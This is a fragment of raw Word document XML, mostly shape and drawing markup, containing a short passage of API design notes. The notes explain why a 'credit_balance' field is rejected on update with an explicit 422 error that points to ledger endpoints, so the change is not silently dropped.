                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2784"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="924"/>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8E9231E" id="Group 26240" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-.95pt;width:68.25pt;height:10.5pt;z-index:-251451392" coordsize="866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iQ3PAMAACgJAAAOAAAAZHJzL2Uyb0RvYy54bWykVtuOmzAQfa/Uf0C8d7kkEIg2Wandy0vV&#10;rrrbD3AcE5AMRrZz2X59xwN2IET7sJsHYuyZ8Tlnxh5u70419w5Mqko0Kz+6CX2PNVRsq2a38v++&#10;Pn7LfE9p0mwJFw1b+W9M+Xfrr19uj+2SxaIUfMukB0EatTy2K7/Uul0GgaIlq4m6ES1rYLEQsiYa&#10;XuUu2EpyhOg1D+IwTIOjkNtWCsqUgtn7btFfY/yiYFT/LgrFtMdXPmDT+JT43JhnsL4ly50kbVnR&#10;Hgb5AIqaVA1s6kLdE028vawmoeqKSqFEoW+oqANRFBVlyAHYROEFmycp9i1y2S2Pu9bJBNJe6PTh&#10;sPTX4Um2L+2zBCWO7Q60wDfD5VTI2vwDSu+Ekr05ydhJexQmszRdLBLfo7AUzWazpJeUlqD7xIuW&#10;D+/6BXbTYATl2EJxqDN/9Tn+LyVpGcqqlsD/WXrVFtBHeeR7DamhStHCwxmUBe2cSGqpQK/PKeSY&#10;kiXdK/3EBEpNDj+V7mpya0ektCN6auxQQmW/W9Mt0cbPoDRD73jOVelSZVZrcWCvAu20SViexJBP&#10;m2nAeTbgzdAwSxYxpHtoag3oflPR7+zf2DzPsoE54ML9sjSO+h3zeN4dSLsyy7MOS7zIcAngjGOP&#10;36xfks07v3kKA9TTLnXlCvTSLO9rdbKEEoDXZDfLb+IRxbMMSHQ+1uo6NgcgigHcBWEHPIqzNM/H&#10;0J0a0SxMElycILy+p1M4msXzeEw7cWkZnt+e4TnF58XJnpZv5+PqZ+Rhba7hg0x02Tp72OKYp32F&#10;TYHHC8ifKb531LC7dsh682upumY4qAK7bP+7eA7BoDqtxTWejsxFnTv+o8Q4HXF2IjrlQrGu3sz5&#10;xmJ1Zx6tz7cKb8zxB/qUQIstONHYq+pKQ+/lVQ0axoswtBvxBqKZO7e75nCk3zgzdwRv/rAC7kvs&#10;B2ZCyd3mB5fegZgOiz8MTnhbkn62Pxe9KULFOMa/qDh3ISN0HYV8uH+MH9M+Qm9s/Bg2d+cZdp60&#10;R9N1eOiTQNr2eRDFOeHOotHOv4GvE9xkwNYMN2L7hr0RBYEmhNJgO0Ye/aeD6ffDd7Q6f+Cs/wMA&#10;AP//AwBQSwMEFAAGAAgAAAAhAIV+IG/dAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMjkFLw0AQ&#10;he+C/2EZwVu72VbFxGxKKeqpCLaCeJtmp0lodjZkt0n6792e9PTm8R5vvnw12VYM1PvGsQY1T0AQ&#10;l840XGn42r/NnkH4gGywdUwaLuRhVdze5JgZN/InDbtQiTjCPkMNdQhdJqUva7Lo564jjtnR9RZD&#10;tH0lTY9jHLetXCTJk7TYcPxQY0ebmsrT7mw1vI84rpfqddiejpvLz/7x43urSOv7u2n9AiLQFP7K&#10;cMWP6FBEpoM7s/Gi1bBIY1HDTEW9xsv0AcQhHqkCWeTyP3/xCwAA//8DAFBLAQItABQABgAIAAAA&#10;IQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAKSqJDc8AwAAKAkAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAIV+IG/dAAAABwEAAA8AAAAAAAAAAAAAAAAAlgUAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAACgBgAAAAA=&#10;">
                <v:shape id="Shape 1191" o:spid="_x0000_s1027" style="position:absolute;width:8667;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8667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fY9wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NagIx&#10;EL4LfYcwQi9Ss1tBdGuUUihY8aLbBxiScbN1M1mS1N2+fVMoeJuP73c2u9F14kYhtp4VlPMCBLH2&#10;puVGwWf9/rQCEROywc4zKfihCLvtw2SDlfEDn+h2To3IIRwrVGBT6ispo7bkMM59T5y5iw8OU4ah&#10;kSbgkMNdJ5+LYikdtpwbLPb0Zklfz99OwYKOgwuzwwevv2q9T3qsy4tV6nE6vr6ASDSmu/jfvTd5&#10;frku4e+bfILc/gIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA9KfY9wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l857250,v2630,,4875,924,6735,2784c865845,4645,866775,6890,866775,9525r,114300c866775,126454,865845,128699,863985,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791l,123825,,9525,2790,2784c4650,924,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,866775,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>credit_balance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is declared </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prohibited</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on update with a message pointing at the ledger endpoints. An explicit 422 beats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24053C7E" w14:textId="5C752F26" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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silently dropping the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>field  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> client that believes it wrote a balance and did not is its own class of bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE843D" w14:textId="28577174"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6112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74FD1657" wp14:editId="2C4F076F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4142481</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19334</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26241" name="Group 26241"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1200" name="Shape 1200"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138218"/>
                                  <a:pt x="578235" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141939"/>
                                  <a:pt x="574130" y="142869"/>
                                  <a:pt x="571500"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8465757" id="Group 26241" o:spid="_x0000_s1026" style="position:absolute;margin-left:326.2pt;margin-top:-1.5pt;width:45.75pt;height:11.25pt;z-index:-251450368" coordsize="581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&#10;">
                <v:shape id="Shape 1200" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1428;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O4xwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;EIXfhf6HMIW+iGYtpbRb42IFQeiDtwo+jpvpXrqZLElc13/fCELfZjjnfHNmmvWmER05X1lWMBkn&#10;IIhzqysuFHzvl6M3ED4ga2wsk4IrechmD4MpptpeeEvdLhQiQtinqKAMoU2l9HlJBv3YtsRR+7HO&#10;YIirK6R2eIlw08jnJHmVBiuOF0psaVFS/rs7GwX77eH0slkf6/p9M5y7+nO9/GKp1NNjP/8AEagP&#10;/+Z7eqVj/YiE2zdxBDn7AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPjDU7jHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581025,6896,581025,9525r,123825c581025,135979,580095,138218,578235,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,58102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7136" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EDD02AA" wp14:editId="2FBC2FB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5361681</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19334</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26243" name="Group 26243"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1203" name="Shape 1203"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637244" y="4645"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637244" y="138218"/>
                                  <a:pt x="635385" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141939"/>
                                  <a:pt x="631280" y="142869"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>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F50C027" id="Group 26243" o:spid="_x0000_s1026" style="position:absolute;margin-left:422.2pt;margin-top:-1.5pt;width:50.25pt;height:11.25pt;z-index:-251449344" coordsize="6381,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&#10;">
                <v:shape id="Shape 1203" o:spid="_x0000_s1027" style="position:absolute;width:6381;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6381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QOtwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NagIx&#10;EL4LfYcwgjdN3IKUrVG0tMWLh1UfYEjGzdLNZNmk6/btjSD0Nh/f76y3o2/FQH1sAmtYLhQIYhNs&#10;w7WGy/lr/gYiJmSLbWDS8EcRtpuXyRpLG25c0XBKtcghHEvU4FLqSimjceQxLkJHnLlr6D2mDPta&#10;2h5vOdy3slBqJT02nBscdvThyPycfr2GQ1R783n9Jls1y8Lsh+ooL07r2XTcvYNINKZ/8dN9sHl+&#10;oV7h8U0+QW7uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPlZA63BAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9526,l628650,v2630,,4875,930,6735,2784c637244,4645,638175,6896,638175,9525r,123825c638175,135979,637244,138218,635385,140078v-1860,1861,-4105,2791,-6735,2797l9526,142875v-2631,-6,-4876,-936,-6736,-2797c930,138218,,135979,1,133350l1,9525c,6896,930,4645,2790,2784,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,63817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8160" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="617E5D8F" wp14:editId="47D822FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>408682</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2095500" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26244" name="Group 26244"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2095500" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2095500" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1207" name="Shape 1207"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4645"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637245" y="138218"/>
                                  <a:pt x="635385" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141939"/>
                                  <a:pt x="631280" y="142869"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>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210" name="Shape 1210"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="933450" y="0"/>
                            <a:ext cx="1162050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155155" y="0"/>
                                  <a:pt x="1157400" y="930"/>
                                  <a:pt x="1159260" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4645"/>
                                  <a:pt x="1162050" y="6890"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
